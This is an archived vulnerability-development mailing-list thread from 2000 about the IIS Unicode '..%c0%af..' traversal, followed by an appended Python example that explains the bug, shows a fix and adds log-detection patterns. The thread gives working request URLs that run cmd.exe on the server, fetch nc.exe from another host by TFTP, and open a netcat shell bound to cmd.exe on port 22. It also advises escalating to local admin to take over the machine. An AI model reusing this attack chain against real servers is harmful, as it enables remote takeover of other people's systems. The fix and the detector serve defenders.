Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: MadHat <madhat () UNSPECIFIC COM>
Date: Mon, 13 Nov 2000 12:25:37 -0600
"Loschiavo, Dave" wrote:
> Thanks, looks like I inadvertently left the "get" out of the message. I was including that in the URL when testing. However, what I did notice was the use of the quotes in the "-i" area of the URL. I was not using quotes. Will have to give that a shot.
Shouldn't need the quotes, but you probably do want to tell the tftp where to put the file. When I tested this, I placed the nc.exe in the scripts dir:

http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe

then used

http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe

Unicode was still used as the scripts dir is usually set as script access only and not execute; if there is a cgi-bin dir with execute access this can make it a lot easier for someone to abuse. If called from IE, I found that the \ don't need to be escaped, but may need to be in Netscape.

So after this, there is a port open (22 in this case, as many admins will leave this open for SSH, but this is an NT box, which as we know rarely has SSH running on it) that I can telnet to and have a command prompt.

There are plenty of ways of doing this... once on the box, use one of the exploits to get IUSER_<MACHINE>, which is who you will be, added to the local admin group, and you control the box. Basic idea for the msadc as well, or any exploit that allows for simple remote command execution.
> -thanks
>
> -----Original Message-----
> From: Robert A. Seace
> To: DLoschiavo () frcc cc ca us
> Cc: VULN-DEV () SECURITYFOCUS COM
> Sent: 11/10/00 10:11 AM
> Subject: Re: dos commands via iis 4 (TFTP)
>
> In the profound words of Loschiavo, Dave:
>
> > I tried tftp commands in the URL, formatted like this:
> >
> > http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/tftp+-i+192.168.1.20+nc.exe"
> >
> > and got nowhere, while this:
> >
> > http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
> >
> > gave me a listing of the c: drive. Am I formatting the "TFTP" URL incorrectly?
>
> Yeah, I think so... But, I'm no TFTP guru, either... Personally, I would just use RCP... However, looking at the original advisory on BugTraq, that mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"), I think you need a "GET" before the "nc.exe", and maybe a destination location specified after it, for where to place it on the NT box... For instance, it shows an URL of:
>
> /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
-- MadHat at unspecific.com "The 3 great virtues of a programmer: Laziness, Impatience, and Hubris." --Larry Wall
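The thread uses the ..%c0%af.. sequence throughout without saying why it walks out of the scripts directory. The following Python is an added example, not code from MadHat, Dave or the advisory he cites: it models the cause (the server's ".." check ran on the percent-decoded bytes before a lenient UTF-8 decode turned the overlong C0 AF pair into "/"), puts a decode-then-check version beside it, and runs a simple check over IIS-style log lines for the request shape seen in this thread (overlong lead bytes in the URI stem, cmd.exe in the stem, tftp/nc in the query). The server model, the vroot-to-directory mapping ("/" standing in for C:\), the function names, the regexes and the log lines are all constructed for the example.

```python
"""Why ..%c0%af.. escapes the web root, a decode-then-check fix, and a log
check for the request shape in the thread. Added example with a modelled
server; all sample data is constructed."""
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Constructed model: "/" stands for C:\; /scripts maps to C:\Inetpub\scripts
# (the tftp destination used in the thread), /msadc to its usual install dir.
VROOTS = {
    "/scripts": "/inetpub/scripts",
    "/msadc": "/program files/common files/system/msadc",
}


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the way the unpatched server did: overlong two-byte forms
    (lead byte C0/C1) are accepted, so b'\\xc0\\xaf' becomes '/'. A strict
    decoder rejects them, which is the core of the fix."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))); i += 2
        else:
            out.append("\ufffd"); i += 1
    return "".join(out)


def _split(url: str):
    """Map the URI stem onto a vroot; return (physical dir, percent-decoded rest)."""
    stem = url.split("?", 1)[0]
    for vroot, phys in VROOTS.items():
        if stem == vroot or stem.startswith(vroot + "/"):
            return phys, unquote_to_bytes(stem[len(vroot):])
    return None, None


def resolve_vulnerable(url: str):
    """Check-then-decode (modelled pre-fix behaviour). The containment check sees
    a component '..\\xc0\\xaf..', which is not '..', and passes; the later lenient
    decode turns that component into '../..' and the path is re-joined."""
    phys, raw = _split(url)
    if phys is None:
        return None
    checked = posixpath.normpath(phys + raw.decode("latin-1").replace("\\", "/"))
    if not checked.startswith(phys + "/"):
        return None                       # a plain ../ is caught here
    return posixpath.normpath(phys + lenient_utf8_decode(raw).replace("\\", "/"))


def resolve_fixed(url: str):
    """Decode-then-check with a strict decoder: C0/C1 lead bytes are rejected
    outright, and the containment test runs on the final path."""
    phys, raw = _split(url)
    if phys is None:
        return None
    try:
        text = raw.decode("utf-8")        # raises on any overlong sequence
    except UnicodeDecodeError:
        return None
    final = posixpath.normpath(phys + text.replace("\\", "/"))
    return final if final.startswith(phys + "/") else None


# Constructed W3C-style log lines: date time c-ip method uri-stem uri-query status
LOG_LINES = [
    "2000-11-13 18:25:37 192.168.1.20 GET /scripts/..%c0%af../winnt/system32/cmd.exe "
    "/c+tftp+-i+192.168.1.20+get+nc.exe+c:\\inetpub\\scripts\\nc.exe 200",
    "2000-11-13 18:26:02 192.168.1.20 GET /scripts/..%c0%af../winnt/system32/cmd.exe "
    "/c+c:\\inetpub\\scripts\\nc.exe+-l+-p+22+-t+-e+cmd.exe 200",
    "2000-11-13 18:30:11 192.168.1.77 GET /scripts/hello.asp - 200",
]
# C0 and C1 are never valid UTF-8 lead bytes, so any such pair is overlong.
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.I)
TOOLS = re.compile(r"\b(?:cmd\.exe|tftp|nc\.exe|ncx99\.exe)\b", re.I)


def flag_request(line: str):
    """Return the reasons a log line matches this attack chain ([] if clean)."""
    parts = line.split(" ")
    if len(parts) < 7:
        return ["unparseable"]
    stem, query = parts[4], parts[5]
    reasons = []
    if OVERLONG.search(stem):
        reasons.append("overlong-utf8-in-uri")
    if TOOLS.search(stem):
        reasons.append("interpreter-in-uri-stem")
    if TOOLS.search(query.replace("+", " ")):
        reasons.append("tool-in-query")
    return reasons


if __name__ == "__main__":
    for u in ("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:",
              "/scripts/../winnt/system32/cmd.exe"):
        print(u, "->", resolve_vulnerable(u), "| fixed:", resolve_fixed(u))
    for ln in LOG_LINES:
        print(flag_request(ln), ln[:60])
```

The two resolvers differ only in ordering and strictness, which is the whole lesson: run every containment check on the fully decoded, canonical path, and reject non-canonical encodings rather than normalising them. The log check deliberately keys on the overlong lead bytes rather than the exact %c0%af string, since the same bug admits other overlong spellings of the separator.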
Current thread:
- Re: dos commands via iis 4 (TFTP) Loschiavo, Dave (Nov 11)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)
- Re: dos commands via iis 4 (TFTP) dsbelile (Nov 15)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 15)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 16)
- Re: dos commands via iis 4 (TFTP) Matt Zimmerman (Nov 16)
- Re: dos commands via iis 4 (TFTP) Bluefish (P.Magnusson) (Nov 16)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 18)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)